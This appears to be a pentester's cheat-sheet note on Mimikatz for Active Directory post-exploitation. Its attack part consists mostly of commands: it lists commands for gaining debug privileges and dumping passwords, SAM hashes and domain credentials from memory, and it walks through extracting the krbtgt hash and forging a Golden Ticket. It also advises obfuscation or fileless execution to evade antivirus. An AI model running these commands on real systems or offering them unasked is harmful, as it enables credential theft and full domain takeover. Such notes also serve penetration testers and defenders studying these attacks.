#Active-Directory #Post-Exploitation 

# Mimikatz

It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. It can also perform pass-the-hash, pass-the-ticket or build _Golden tickets_ on Windows systems.

Its a pretty notorious tool that can trigger AV filters, some steps have to be taken before executing this tool on a system (such as obfuscation) or using `Invoke-Mimikatz` module of `PowerSploit` framework for file-less execution.

- [Official source](https://github.com/gentilkiwi/mimikatz)
- [PowerSploit](https://github.com/PowerShellMafia/PowerSploit)

### Credential Dumping
`mimikatz` can extract _juicy_ information that is actively loaded in memory or from backup registry files. Before we begin to extract information, there are 2 commands that has to be executed first;

``` cmd
mimikatz # privilege::debug
mimikatz #
mimikatz # token::elevate
mimikatz # 
```

This ensures that `mimikatz` has unrestricted access to do its work on the system. And of course, it is necessary to run this tool on an administrator level first.

[Official wiki](https://github.com/gentilkiwi/mimikatz/wiki) contains all the commands and their usage scenarios. Few notable commands;

``` cmd
mimikatz # sekurlsa::logonpasswords (Extracts passwords of active sessions)
mimikatz # 
mimikatz # lsadump::sam (Dumps local SAM hashes)
mimikatz # 
mimikatz # lsadump::lsa /patch (Dumps available Domain credentials)
mimikatz # 
```

### Golden Ticket Attack
A "Golden Ticket" gives an attacker **unrestricted access to the entire domain**. This allows mounting domain shares, executing "rpc" related tools and other domain related commands/attacks with ease.

To create a golden ticket, 	primarily we need "krbtgt" (Kerberos Ticket Granting Ticket) account's NTLM hash and its Domain SID, both of which can be obtained fairly easily. `mimkatz` can be used to extract these values with the following command;

``` cmd
mimikatz # lsadump::lsa /inject /name:krbtgt
mimikatz # 
```

Create a golden ticket with `mimikatz`;

``` cmd
mimikatz # kerberos::golden /User:<Desired username> /domain:<Domain> /sid:<SID> /krbtgt:<NTLM of krbtgt> /id:500 (/ptt OR /ticket:<Filename>)
mimikatz # 
mimikatz # misc::cmd (Spawn a new session with the effects of golden ticket)
mimikatz # 
```

"`/id:500`" -> Identifier for administrator accounts
"`/ptt`" -> "Pass the Ticket", activates the ticket for current and future sessions
"`/ticket:<Filename>`" -> Saves the ticket to a file

- [Visual guide](https://rycon.hu/papers/goldenticket.html) for Golden Ticket attack
- [Defensive measures](https://cert.europa.eu/static/WhitePapers/CERT-EU-SWP_14_07_PassTheGolden_Ticket_v1_1.pdf) against Golden Ticket attack

